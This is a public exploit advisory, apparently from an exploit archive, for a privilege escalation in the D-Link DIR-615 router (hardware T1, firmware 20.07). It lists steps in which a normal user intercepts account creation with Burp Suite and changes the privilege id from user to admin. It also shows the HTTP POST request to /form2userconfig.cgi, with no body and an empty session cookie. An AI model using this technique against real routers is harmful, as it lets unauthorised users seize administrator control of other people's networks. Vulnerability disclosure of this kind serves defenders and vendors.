D-Link DIR-615 Privilege Escalation

D-Link DIR-615 suffers from a privilege escalation vulnerability.

MD5 | 493e75de8e7ec25a2de010cb3530fb22

# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: N/A

# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e:]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin)
# by changing privileges id (1 to 2) with burp suite.

# Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Connection: close
Cookie: SessionID=
Upgrade-Insecure-Requests: 1


# Now log in with newly created root (ptguy) user. You have all administrator rights.

Related Posts